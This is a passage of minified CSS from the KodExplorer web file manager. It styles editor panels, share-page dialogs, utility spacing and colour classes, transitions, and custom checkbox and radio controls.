5px;color:#999;text-align:center;}.edit-right-frame .function-list-box .list-row{padding:2px 5px;cursor:default;font-family:Tahoma, Arial;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;-webkit-transition:all 0.1s;-moz-transition:all 0.1s;-o-transition:all 0.1s;-ms-transition:all 0.1s;transition:all 0.1s;}.edit-right-frame .function-list-box .list-row.row-hover{background:#ddd;border-radius:3px;}.edit-right-frame .function-list-box .list-row.row-select{background:#63acff;color:#fff;border-radius:3px;}.edit-right-frame .function-list-box .list-row .icon{font-family:FontAwesome;font-style:normal;width:20px;display:inline-block;text-decoration:inherit;font-size:10px;-webkit-transform:scale(0.8,0.8);transform:scale(0.8,0.8);}.edit-right-frame .function-list-box .list-row span{cursor:default;}.edit-right-frame .function-list-box .list-row.mark .icon{color:#666;}.edit-right-frame .function-list-box .list-row.mark .icon:before{content:"\f005";}.edit-right-frame .function-list-box .list-row.mark,.edit-right-frame .function-list-box .list-row.class{background:#eee;font-weight:800;border-radius:3px;}.edit-right-frame .function-list-box .list-row.mark.row-select,.edit-right-frame .function-list-box .list-row.class.row-select{color:#fff;background:#63acff;}.edit-right-frame .function-list-box .list-row.row-select .icon{color:#fff !important;}.edit-right-frame .function-list-box .list-row.class .icon{color:#888;}.edit-right-frame .function-list-box .list-row.class .icon:before{content:"\f0c9";}.edit-right-frame .function-list-box .list-row.function .icon{color:#378eef;}.edit-right-frame .function-list-box .list-row.function .icon:before{content:"\f111";}.edit-right-frame .function-list-box .list-row.function-define .icon{color:#98c878;}.edit-right-frame .function-list-box .list-row.function-value .icon{color:#ffb16d;}.edit-right-frame .function-list-box .list-row.function-var .icon{color:#008641;}.share-page-passowrd{margin:0 auto;width:220px;height:120p;margin-top:17%;border:1px solid #ddd;border-top:3px solid #666;padding:40px;border-radius:5px;background:#f6f6f6;}.share-page-passowrd b{font-size:20px;display:block;margin-bottom:20px;}.share-page-passowrd input{height:32px;display:inline-block;width:150px;padding:0px 5px;margin-right:10px;margin-bottom:10px;}.share-page-error{margin:0 auto;width:400px;margin-top:17%;border:1px solid #eee;padding:30px;border-radius:5px;background:#f6f6f6;font-size:1.25em;}.share-page-error b{font-size:25px;display:block;margin-bottom:20px;}.edit-content.markdown-full-page pre.ace_editor{width:100% !important;}.edit-content.markdown-full-page .resize{display:none;}.edit-content.markdown-full-page .edit-right-frame{top:0px;left:-1px;right:0;width:100% !important;bottom:0;}.edit-content.markdown-full-page .edit-right-frame .right-main{width:100% !important;}.edit-content.markdown-full-page .edit-right-frame .display-markdown{width:100% !important;background:none;}.edit-content.markdown-full-page .edit-right-frame .markdown-preview{width:80%;padding:50px 0;}.edit-content.markdown-full-page .edit-right-frame i.icon-resize-full:before{content:"\f066";}.edit-content.markdown-full-page .edit-right-frame .preview-markdown-tool .toolbar{width:80%;left:10%;border:none;border-bottom:1px solid #ddd;background:rgba(240,240,240,0.5);}.edit-content.markdown-full-page .edit-right-frame .preview-markdown-tool .toolbar{display:none;}.edit-content.markdown-full-page .edit-content.markdown-full-page .edit-right-frame +/* power by kodexplorer ver 4.06(2017-08-30) [build 1504100992.2181] */ +body{font-size:12px;padding:0px;margin:0px;font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}textarea,input,button,pre,p,.can-select{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;}blockquote{padding:10px 20px;margin:0 0 20px 1em;border-left:10px solid #eee;background:#f6f6f6;}blockquote p{font-size:1em;margin:0px;}a{text-decoration:none;}a:focus{outline:none !important;}h1,h2,h3,h4,h5,.h1,.h2,.h3,.h4,.h5{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;}*,*:before,*:after{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;}label{font-weight:normal;}pre{border:none;border-radius:0;}::-webkit-scrollbar-track-piece{background-color:rgba(180,180,180,0.06);border-radius:3px;}::-webkit-scrollbar{width:10px;height:10px;}::-webkit-scrollbar-thumb{background-color:rgba(180,180,180,0.2);border-radius:12px;background-clip:padding-box;border:1px solid rgba(180,180,180,0.4);min-height:28px;}::-webkit-scrollbar-thumb:hover{background-color:rgba(180,180,180,0.4);border:1px solid rgba(180,180,180,0.7);}.can-select,.can-select *{-khtml-user-select:text !important;-webkit-user-select:text !important;-moz-user-select:text !important;-ms-user-select:text !important;-o-user-select:text !important;user-select:text !important;}.can-not-select,.can-not-select *{-khtml-user-select:none !important;-webkit-user-select:none !important;-moz-user-select:none !important;-ms-user-select:none !important;-o-user-select:none !important;user-select:none !important;}.fl{float:left;}.fl-left{float:left;}.fl-right{float:right;}.disable,.disabled{cursor:not-allowed;pointer-events:none;}.clear{clear:both;}.hidden{display:none;}.FontAwesome{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;font-size:18px;}.font-nomal{font-weight:800;}.font-bold,.bold{font-weight:800;}.font-400{font-weight:400;}.font-800{font-weight:800;}.size12{font-size:12px;}.size14{font-size:14px;}.size16{font-size:16px;}.size18{font-size:18px;}.size20{font-size:20px;}.size22{font-size:22px;}.align-left{text-align:left;}.align-center{text-align:center;}.align-right{text-align:right;}.p-5{padding:5px;}.p-10{padding:10px;}.p-15{padding:15px;}.p-20{padding:20px;}.p-25{padding:25px;}.p-30{padding:30px;}.p-35{padding:35px;}.p-40{padding:40px;}.p-45{padding:45px;}.p-50{padding:50px;}.pt-5{padding-top:5px;}.pr-5{padding-right:5px;}.pb-5{padding-bottom:5px;}.pl-5{padding-left:5px;}.pt-10{padding-top:10px;}.pr-10{padding-right:10px;}.pb-10{padding-bottom:10px;}.pl-10{padding-left:10px;}.pt-15{padding-top:15px;}.pr-15{padding-right:15px;}.pb-15{padding-bottom:15px;}.pl-15{padding-left:15px;}.pt-20{padding-top:20px;}.pr-20{padding-right:20px;}.pb-20{padding-bottom:20px;}.pl-20{padding-left:20px;}.pt-25{padding-top:25px;}.pr-25{padding-right:25px;}.pb-25{padding-bottom:25px;}.pl-25{padding-left:25px;}.pt-30{padding-top:30px;}.pr-30{padding-right:30px;}.pb-30{padding-bottom:30px;}.pl-30{padding-left:30px;}.pt-35{padding-top:35px;}.pr-35{padding-right:35px;}.pb-35{padding-bottom:35px;}.pl-35{padding-left:35px;}.pt-40{padding-top:40px;}.pr-40{padding-right:40px;}.pb-40{padding-bottom:40px;}.pl-40{padding-left:40px;}.pt-45{padding-top:45px;}.pr-45{padding-right:45px;}.pb-45{padding-bottom:45px;}.pl-45{padding-left:45px;}.pt-50{padding-top:50px;}.pr-50{padding-right:50px;}.pb-50{padding-bottom:50px;}.pl-50{padding-left:50px;}.m-5{margin:5px;}.m-10{margin:10px;}.m-15{margin:15px;}.m-20{margin:20px;}.m-25{margin:25px;}.m-30{margin:30px;}.m-35{margin:35px;}.m-40{margin:40px;}.m-45{margin:45px;}.m-50{margin:50px;}.mt-5{margin-top:5px;}.mr-5{margin-right:5px;}.mb-5{margin-bottom:5px;}.ml-5{margin-left:5px;}.mt-10{margin-top:10px;}.mr-10{margin-right:10px;}.mb-10{margin-bottom:10px;}.ml-10{margin-left:10px;}.mt-15{margin-top:15px;}.mr-15{margin-right:15px;}.mb-15{margin-bottom:15px;}.ml-15{margin-left:15px;}.mt-20{margin-top:20px;}.mr-20{margin-right:20px;}.mb-20{margin-bottom:20px;}.ml-20{margin-left:20px;}.mt-25{margin-top:25px;}.mr-25{margin-right:25px;}.mb-25{margin-bottom:25px;}.ml-25{margin-left:25px;}.mt-30{margin-top:30px;}.mr-30{margin-right:30px;}.mb-30{margin-bottom:30px;}.ml-30{margin-left:30px;}.mt-35{margin-top:35px;}.mr-35{margin-right:35px;}.mb-35{margin-bottom:35px;}.ml-35{margin-left:35px;}.mt-40{margin-top:40px;}.mr-40{margin-right:40px;}.mb-40{margin-bottom:40px;}.ml-40{margin-left:40px;}.mt-45{margin-top:45px;}.mr-45{margin-right:45px;}.mb-45{margin-bottom:45px;}.ml-45{margin-left:45px;}.mt-50{margin-top:50px;}.mr-50{margin-right:50px;}.mb-50{margin-bottom:50px;}.ml-50{margin-left:50px;}.blue-1{color:#ecf6fd;}.bg-blue-1{background:#ecf6fd;}.bdcolor-blue-1{border-color:#ecf6fd;}.blue-2{color:#d2eafb;}.bg-blue-2{background:#d2eafb;}.bdcolor-blue-2{border-color:#d2eafb;}.blue-3{color:#add8f7;}.bg-blue-3{background:#add8f7;}.bdcolor-blue-3{border-color:#add8f7;}.blue-4{color:#7ec2f3;}.bg-blue-4{background:#7ec2f3;}.bdcolor-blue-4{border-color:#7ec2f3;}.blue-5{color:#49a9ee;}.bg-blue-5{background:#49a9ee;}.bdcolor-blue-5{border-color:#49a9ee;}.blue-6{color:#108ee9;}.bg-blue-6{background:#108ee9;}.bdcolor-blue-6{border-color:#108ee9;}.blue-7{color:#0e77ca;}.bg-blue-7{background:#0e77ca;}.bdcolor-blue-7{border-color:#0e77ca;}.blue-8{color:#0c60aa;}.bg-blue-8{background:#0c60aa;}.bdcolor-blue-8{border-color:#0c60aa;}.blue-9{color:#09488a;}.bg-blue-9{background:#09488a;}.bdcolor-blue-9{border-color:#09488a;}.blue-10{color:#073069;}.bg-blue-10{background:#073069;}.bdcolor-blue-10{border-color:#073069;}.purple-1{color:#f4f3fd;}.bg-purple-1{background:#f4f3fd;}.bdcolor-purple-1{border-color:#f4f3fd;}.purple-2{color:#e4e2fa;}.bg-purple-2{background:#e4e2fa;}.bdcolor-purple-2{border-color:#e4e2fa;}.purple-3{color:#cfcaf6;}.bg-purple-3{background:#cfcaf6;}.bdcolor-purple-3{border-color:#cfcaf6;}.purple-4{color:#b3acf2;}.bg-purple-4{background:#b3acf2;}.bdcolor-purple-4{border-color:#b3acf2;}.purple-5{color:#948aec;}.bg-purple-5{background:#948aec;}.bdcolor-purple-5{border-color:#948aec;}.purple-6{color:#7265e6;}.bg-purple-6{background:#7265e6;}.bdcolor-purple-6{border-color:#7265e6;}.purple-7{color:#6252cd;}.bg-purple-7{background:#6252cd;}.bdcolor-purple-7{border-color:#6252cd;}.purple-8{color:#533eb4;}.bg-purple-8{background:#533eb4;}.bdcolor-purple-8{border-color:#533eb4;}.purple-9{color:#42299a;}.bg-purple-9{background:#42299a;}.bdcolor-purple-9{border-color:#42299a;}.purple-10{color:#321580;}.bg-purple-10{background:#321580;}.bdcolor-purple-10{border-color:#321580;}.cyan-1{color:#ebf8f9;}.bg-cyan-1{background:#ebf8f9;}.bdcolor-cyan-1{border-color:#ebf8f9;}.cyan-2{color:#cfedf0;}.bg-cyan-2{background:#cfedf0;}.bdcolor-cyan-2{border-color:#cfedf0;}.cyan-3{color:#a7dfe3;}.bg-cyan-3{background:#a7dfe3;}.bdcolor-cyan-3{border-color:#a7dfe3;}.cyan-4{color:#76cdd3;}.bg-cyan-4{background:#76cdd3;}.bdcolor-cyan-4{border-color:#76cdd3;}.cyan-5{color:#3db8c1;}.bg-cyan-5{background:#3db8c1;}.bdcolor-cyan-5{border-color:#3db8c1;}.cyan-6{color:#00a2ae;}.bg-cyan-6{background:#00a2ae;}.bdcolor-cyan-6{border-color:#00a2ae;}.cyan-7{color:#008997;}.bg-cyan-7{background:#008997;}.bdcolor-cyan-7{border-color:#008997;}.cyan-8{color:#00707f;}.bg-cyan-8{background:#00707f;}.bdcolor-cyan-8{border-color:#00707f;}.cyan-9{color:#005667;}.bg-cyan-9{background:#005667;}.bdcolor-cyan-9{border-color:#005667;}.cyan-10{color:#003c4e;}.bg-cyan-10{background:#003c4e;}.bdcolor-cyan-10{border-color:#003c4e;}.green-1{color:#ebf8f2;}.bg-green-1{background:#ebf8f2;}.bdcolor-green-1{border-color:#ebf8f2;}.green-2{color:#cfefdf;}.bg-green-2{background:#cfefdf;}.bdcolor-green-2{border-color:#cfefdf;}.green-3{color:#a7e1c4;}.bg-green-3{background:#a7e1c4;}.bdcolor-green-3{border-color:#a7e1c4;}.green-4{color:#76d0a3;}.bg-green-4{background:#76d0a3;}.bdcolor-green-4{border-color:#76d0a3;}.green-5{color:#3dbd7d;}.bg-green-5{background:#3dbd7d;}.bdcolor-green-5{border-color:#3dbd7d;}.green-6{color:#00a854;}.bg-green-6{background:#00a854;}.bdcolor-green-6{border-color:#00a854;}.green-7{color:#00924c;}.bg-green-7{background:#00924c;}.bdcolor-green-7{border-color:#00924c;}.green-8{color:#007b43;}.bg-green-8{background:#007b43;}.bdcolor-green-8{border-color:#007b43;}.green-9{color:#00643b;}.bg-green-9{background:#00643b;}.bdcolor-green-9{border-color:#00643b;}.green-10{color:#004c32;}.bg-green-10{background:#004c32;}.bdcolor-green-10{border-color:#004c32;}.pink-1{color:#feeff5;}.bg-pink-1{background:#feeff5;}.bdcolor-pink-1{border-color:#feeff5;}.pink-2{color:#fdd8e7;}.bg-pink-2{background:#fdd8e7;}.bdcolor-pink-2{border-color:#fdd8e7;}.pink-3{color:#fcb8d3;}.bg-pink-3{background:#fcb8d3;}.bdcolor-pink-3{border-color:#fcb8d3;}.pink-4{color:#fa90ba;}.bg-pink-4{background:#fa90ba;}.bdcolor-pink-4{border-color:#fa90ba;}.pink-5{color:#f7629e;}.bg-pink-5{background:#f7629e;}.bdcolor-pink-5{border-color:#f7629e;}.pink-6{color:#f5317f;}.bg-pink-6{background:#f5317f;}.bdcolor-pink-6{border-color:#f5317f;}.pink-7{color:#dc277d;}.bg-pink-7{background:#dc277d;}.bdcolor-pink-7{border-color:#dc277d;}.pink-8{color:#c11c7b;}.bg-pink-8{background:#c11c7b;}.bdcolor-pink-8{border-color:#c11c7b;}.pink-9{color:#a71278;}.bg-pink-9{background:#a71278;}.bdcolor-pink-9{border-color:#a71278;}.pink-10{color:#8c0776;}.bg-pink-10{background:#8c0776;}.bdcolor-pink-10{border-color:#8c0776;}.red-1{color:#fef0ef;}.bg-red-1{background:#fef0ef;}.bdcolor-red-1{border-color:#fef0ef;}.red-2{color:#fcdbd9;}.bg-red-2{background:#fcdbd9;}.bdcolor-red-2{border-color:#fcdbd9;}.red-3{color:#fabeb9;}.bg-red-3{background:#fabeb9;}.bdcolor-red-3{border-color:#fabeb9;}.red-4{color:#f79992;}.bg-red-4{background:#f79992;}.bdcolor-red-4{border-color:#f79992;}.red-5{color:#f46e65;}.bg-red-5{background:#f46e65;}.bdcolor-red-5{border-color:#f46e65;}.red-6{color:#f04134;}.bg-red-6{background:#f04134;}.bdcolor-red-6{border-color:#f04134;}.red-7{color:#d73435;}.bg-red-7{background:#d73435;}.bdcolor-red-7{border-color:#d73435;}.red-8{color:#bd2636;}.bg-red-8{background:#bd2636;}.bdcolor-red-8{border-color:#bd2636;}.red-9{color:#a31837;}.bg-red-9{background:#a31837;}.bdcolor-red-9{border-color:#a31837;}.red-10{color:#880a38;}.bg-red-10{background:#880a38;}.bdcolor-red-10{border-color:#880a38;}.orange-1{color:#fef3eb;}.bg-orange-1{background:#fef3eb;}.bdcolor-orange-1{border-color:#fef3eb;}.orange-2{color:#fde3cf;}.bg-orange-2{background:#fde3cf;}.bdcolor-orange-2{border-color:#fde3cf;}.orange-3{color:#fccca7;}.bg-orange-3{background:#fccca7;}.bdcolor-orange-3{border-color:#fccca7;}.orange-4{color:#faaf76;}.bg-orange-4{background:#faaf76;}.bdcolor-orange-4{border-color:#faaf76;}.orange-5{color:#f78e3d;}.bg-orange-5{background:#f78e3d;}.bdcolor-orange-5{border-color:#f78e3d;}.orange-6{color:#f56a00;}.bg-orange-6{background:#f56a00;}.bdcolor-orange-6{border-color:#f56a00;}.orange-7{color:#d75000;}.bg-orange-7{background:#d75000;}.bdcolor-orange-7{border-color:#d75000;}.orange-8{color:#b93600;}.bg-orange-8{background:#b93600;}.bdcolor-orange-8{border-color:#b93600;}.orange-9{color:#991b00;}.bg-orange-9{background:#991b00;}.bdcolor-orange-9{border-color:#991b00;}.orange-10{color:#7a0000;}.bg-orange-10{background:#7a0000;}.bdcolor-orange-10{border-color:#7a0000;}.yellow-1{color:#fffaeb;}.bg-yellow-1{background:#fffaeb;}.bdcolor-yellow-1{border-color:#fffaeb;}.yellow-2{color:#fff3cf;}.bg-yellow-2{background:#fff3cf;}.bdcolor-yellow-2{border-color:#fff3cf;}.yellow-3{color:#ffe9a7;}.bg-yellow-3{background:#ffe9a7;}.bdcolor-yellow-3{border-color:#ffe9a7;}.yellow-4{color:#ffdd76;}.bg-yellow-4{background:#ffdd76;}.bdcolor-yellow-4{border-color:#ffdd76;}.yellow-5{color:#ffce3d;}.bg-yellow-5{background:#ffce3d;}.bdcolor-yellow-5{border-color:#ffce3d;}.yellow-6{color:#ffbf00;}.bg-yellow-6{background:#ffbf00;}.bdcolor-yellow-6{border-color:#ffbf00;}.yellow-7{color:#e09a00;}.bg-yellow-7{background:#e09a00;}.bdcolor-yellow-7{border-color:#e09a00;}.yellow-8{color:#c17500;}.bg-yellow-8{background:#c17500;}.bdcolor-yellow-8{border-color:#c17500;}.yellow-9{color:#a04f00;}.bg-yellow-9{background:#a04f00;}.bdcolor-yellow-9{border-color:#a04f00;}.yellow-10{color:#802800;}.bg-yellow-10{background:#802800;}.bdcolor-yellow-10{border-color:#802800;}.grey-1{color:#fbfbfb;}.bg-grey-1{background:#fbfbfb;}.bdcolor-grey-1{border-color:#fbfbfb;}.grey-2{color:#f7f7f7;}.bg-grey-2{background:#f7f7f7;}.bdcolor-grey-2{border-color:#f7f7f7;}.grey-3{color:#f5f5f5;}.bg-grey-3{background:#f5f5f5;}.bdcolor-grey-3{border-color:#f5f5f5;}.grey-4{color:#e9e9e9;}.bg-grey-4{background:#e9e9e9;}.bdcolor-grey-4{border-color:#e9e9e9;}.grey-5{color:#d9d9d9;}.bg-grey-5{background:#d9d9d9;}.bdcolor-grey-5{border-color:#d9d9d9;}.grey-6{color:#bfbfbf;}.bg-grey-6{background:#bfbfbf;}.bdcolor-grey-6{border-color:#bfbfbf;}.grey-7{color:#919191;}.bg-grey-7{background:#919191;}.bdcolor-grey-7{border-color:#919191;}.grey-8{color:#5a5a5a;}.bg-grey-8{background:#5a5a5a;}.bdcolor-grey-8{border-color:#5a5a5a;}.grey-9{color:#404040;}.bg-grey-9{background:#404040;}.bdcolor-grey-9{border-color:#404040;}.grey-10{color:#222;}.bg-grey-10{background:#222;}.bdcolor-grey-10{border-color:#222;}.translation-fast{-webkit-transition:all 0.168s ease-in-out;-moz-transition:all 0.168s ease-in-out;-o-transition:all 0.168s ease-in-out;-ms-transition:all 0.168s ease-in-out;transition:all 0.168s ease-in-out;}.translation-nomal{-webkit-transition:all 0.25s ease-in-out;-moz-transition:all 0.25s ease-in-out;-o-transition:all 0.25s ease-in-out;-ms-transition:all 0.25s ease-in-out;transition:all 0.25s ease-in-out;}.translation-slow{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-200{-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;}.translation-300{-webkit-transition:all 0.3s ease-in-out;-moz-transition:all 0.3s ease-in-out;-o-transition:all 0.3s ease-in-out;-ms-transition:all 0.3s ease-in-out;transition:all 0.3s ease-in-out;}.translation-500{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-1000{-webkit-transition:all 1.0s ease-in-out;-moz-transition:all 1.0s ease-in-out;-o-transition:all 1.0s ease-in-out;-ms-transition:all 1.0s ease-in-out;transition:all 1.0s ease-in-out;}.label{font-weight:400;font-size:1em;display:inline-block;}.label.label-blue-deep{background:#1b63ab;color:#fff;}.label.label-blue-nomal{background:#39f;color:#fff;}.label.label-blue-light{background:#d4e9ff;color:#39f;}.label.label-grey-deep{background:#464c5b;color:#fff;}.label.label-grey-nomal{background:#657180;color:#fff;}.label.label-grey-light{background:#9ea7b4;color:#fff;}.label.label-yellow-deep{background:#ff9900;color:#fff;}.label.label-yellow-nomal{background:#ffc267;color:#fff;}.label.label-yellow-light{background:#ffe2b6;color:#ff9900;}.label.label-green-deep{background:#068c49;color:#fff;}.label.label-green-nomal{background:#00cc66;color:#fff;}.label.label-green-light{background:#beffde;color:#068c49;}.cursor-mouse.cursor-default *{cursor:url("../../../images/common/cursor/default.png"), auto !important;}.cursor-mouse.cursor-move *{cursor:url("../../../images/common/cursor/move.png"), auto !important;}.cursor-mouse.cursor-down *{cursor:url("../../../images/common/cursor/down.png"), auto !important;}.cursor-mouse.cursor-add *{cursor:url("../../../images/common/cursor/add.png"), auto !important;}@media screen and (max-width:100000px){input[type="checkbox"].kui-checkbox-ios{ display:none !important;} input[type="checkbox"].kui-checkbox-ios +em{ vertical-align:middle;display:inline-block;margin:0 0.8em 0 0;border:1px solid #ddd;cursor:pointer;border-radius:999px;background-color:#f6f6f6;-webkit-transition:all 0.4s;-moz-transition:all 0.4s;-o-transition:all 0.4s;-ms-transition:all 0.4s;transition:all 0.4s;box-shadow:inset 0 0 0 0px rgba(0,0,0,0.4);} input[type="checkbox"].kui-checkbox-ios +em:after{ float:left;content:'';margin:1px 0 0 1px;width:18px;height:18px;border-radius:inherit;background:#ffffff;-webkit-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-moz-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-o-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-ms-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);transition:all 0.4s cubic-bezier(.54,1.85,.5,1);box-shadow:0 1px 3px rgba(0,0,0,0.4);pointer-events:none;} input[type="checkbox"].kui-checkbox-ios:checked +em{ background-color:#64bd63;border:1px solid #64bd63;} input[type="checkbox"].kui-checkbox-ios:checked +em:after{ background-color:#ffffff;box-shadow:0px 2px 5px rgba(0,0,0,0.3);} input[type="checkbox"].kui-checkbox-ios.size-smallx +em{ width:20px;height:10px;} input[type="checkbox"].kui-checkbox-ios.size-smallx +em:after{ width:8px;height:8px;} input[type="checkbox"].kui-checkbox-ios.size-smallx:checked +em:after{ margin-left:11px;} input[type="checkbox"].kui-checkbox-ios.size-small +em{ width:30px;height:15px;} input[type="checkbox"].kui-checkbox-ios.size-small +em:after{ width:13px;height:13px;} input[type="checkbox"].kui-checkbox-ios.size-small:checked +em:after{ margin-left:16px;} input[type="checkbox"].kui-checkbox-ios +em{ width:40px;height:20px;} input[type="checkbox"].kui-checkbox-ios +em:after{ width:18px;height:18px;} input[type="checkbox"].kui-checkbox-ios:checked +em:after{ margin-left:21px;} input[type="checkbox"].kui-checkbox-ios.size-big +em{ width:50px;height:25px;} input[type="checkbox"].kui-checkbox-ios.size-big +em:after{ width:23px;height:23px;} input[type="checkbox"].kui-checkbox-ios.size-big:checked +em:after{ margin-left:26px;} input[type="checkbox"].kui-checkbox-ios.size-bigx +em{ width:80px;height:40px;} input[type="checkbox"].kui-checkbox-ios.size-bigx +em:after{ width:38px;height:38px;} input[type="checkbox"].kui-checkbox-ios.size-bigx:checked +em:after{ margin-left:41px;} input[type="checkbox"].kui-checkbox-ios:checked +em{ background-color:#63acff;border:1px solid #63acff;box-shadow:inset 0 0 0 10px #63acff;} input[type="checkbox"].kui-checkbox-ios.red:checked +em{ background-color:#ff5722;border:1px solid #ff5722;box-shadow:inset 0 0 0 10px #ff5722;} input[type="checkbox"].kui-checkbox-ios.blue:checked +em{ background-color:#63acff;border:1px solid #63acff;box-shadow:inset 0 0 0 10px #63acff;} input[type="checkbox"].kui-checkbox-ios.green:checked +em{ background-color:#64bd63;border:1px solid #64bd63;box-shadow:inset 0 0 0 10px #64bd63;} input[type="checkbox"].kui-checkbox-ios.yellow:checked +em{ background-color:#ffc107;border:1px solid #ffc107;box-shadow:inset 0 0 0 10px #ffc107;} input[type="checkbox"].kui-checkbox-ios.grey:checked +em{ background-color:#aaa;border:1px solid #aaa;box-shadow:inset 0 0 0 10px #aaa;} input[type="checkbox"].kui-checkbox-ios.black:checked +em{ background-color:#444;border:1px solid #444;box-shadow:inset 0 0 0 10px #444;} input[type="checkbox"].kui-checkbox{ background:#f6f6f6;cursor:pointer;border:1px solid #ddd !important;outline:none;text-align:center;border-radius:10%;display:inline-block;background-clip:padding-box;appearance:none;-moz-appearance:none;-webkit-appearance:none;} input[type="checkbox"].kui-checkbox:before{ font-family:FontAwesome;content:"\f00c";color:#f6f6f6;} input[type="checkbox"].kui-checkbox:checked{ background:#1b7e5a;border-color:#1b7e5a !important;} input[type="checkbox"].kui-checkbox:checked:before{ color:#fff;} input[type="checkbox"].kui-checkbox:checked:hover, input[type="checkbox"].kui-checkbox:checked:focus{ box-shadow:none !important;} input[type="checkbox"].kui-checkbox:hover, input[type="checkbox"].kui-checkbox:focus{ border-color:#1b7e5a !important;box-shadow:0 0 0 1px #1b7e5a !important;} input[type="checkbox"].kui-checkbox.radius{ border-radius:999px;} input[type="checkbox"].kui-checkbox.size-smallx{ height:16px;font-size:9.6px;width:16px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-smallx:before{ line-height:16px;} input[type="checkbox"].kui-checkbox.size-small{ height:18px;font-size:10.8px;width:18px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-small:before{ line-height:18px;} input[type="checkbox"].kui-checkbox{ height:20px;font-size:12px;width:20px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox:before{ line-height:20px;} input[type="checkbox"].kui-checkbox.size-big{ height:26px;font-size:15.6px;width:26px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-big:before{ line-height:26px;} input[type="checkbox"].kui-checkbox.size-bigx{ height:32px;font-size:19.2px;width:32px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-bigx:before{ line-height:32px;} input[type="checkbox"].kui-checkbox:checked{ background:#63acff;border-color:#63acff !important;} input[type="checkbox"].kui-checkbox:hover, input[type="checkbox"].kui-checkbox:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="checkbox"].kui-checkbox.red:checked{ background:#ff5722;border-color:#ff5722 !important;} input[type="checkbox"].kui-checkbox.red:hover, input[type="checkbox"].kui-checkbox.red:focus{ border-color:#ff5722 !important;box-shadow:0 0 0 1px #ff5722 !important;} input[type="checkbox"].kui-checkbox.blue:checked{ background:#63acff;border-color:#63acff !important;} input[type="checkbox"].kui-checkbox.blue:hover, input[type="checkbox"].kui-checkbox.blue:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="checkbox"].kui-checkbox.green:checked{ background:#64bd63;border-color:#64bd63 !important;} input[type="checkbox"].kui-checkbox.green:hover, input[type="checkbox"].kui-checkbox.green:focus{ border-color:#64bd63 !important;box-shadow:0 0 0 1px #64bd63 !important;} input[type="checkbox"].kui-checkbox.yellow:checked{ background:#ffc107;border-color:#ffc107 !important;} input[type="checkbox"].kui-checkbox.yellow:hover, input[type="checkbox"].kui-checkbox.yellow:focus{ border-color:#ffc107 !important;box-shadow:0 0 0 1px #ffc107 !important;} input[type="checkbox"].kui-checkbox.grey:checked{ background:#aaa;border-color:#aaa !important;} input[type="checkbox"].kui-checkbox.grey:hover, input[type="checkbox"].kui-checkbox.grey:focus{ border-color:#aaa !important;box-shadow:0 0 0 1px #aaa !important;} input[type="checkbox"].kui-checkbox.black:checked{ background:#444;border-color:#444 !important;} input[type="checkbox"].kui-checkbox.black:hover, input[type="checkbox"].kui-checkbox.black:focus{ border-color:#444 !important;box-shadow:0 0 0 1px #444 !important;} input[type="radio"].kui-radio{ background:#f6f6f6;cursor:pointer;border:1px solid #ddd !important;outline:none;border-radius:999px;display:inline-block;text-align:center;-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;background-clip:padding-box;box-shadow:0 1px 2px rgba(0,0,0,0.05), inset 0px -15px 10px -12px rgba(0,0,0,0.05);appearance:none;-moz-appearance:none;-webkit-appearance:none;} input[type="radio"].kui-radio:before{ font-family:FontAwesome;content:"\f00c";color:#f6f6f6;} input[type="radio"].kui-radio:checked:before{ color:#fff;} input[type="radio"].kui-radio:checked:hover, input[type="radio"].kui-radio:checked:focus{ box-shadow:none !important;} input[type="radio"].kui-radio:hover, input[type="radio"].kui-radio:focus{ border-color:#224 !important;} input[type="radio"].kui-radio.size-smallx{ font-size:9.6px;height:16px;width:16px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-smallx:before{ line-height:14px;} input[type="radio"].kui-radio.size-small{ font-size:10.8px;height:18px;width:18px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-small:before{ line-height:16px;} input[type="radio"].kui-radio{ font-size:14.4px;height:24px;width:24px !important;margin-right:0.8em;} input[type="radio"].kui-radio:before{ line-height:22px;} input[type="radio"].kui-radio.size-big{ font-size:15.6px;height:26px;width:26px !important;margin-right:0.8em;} 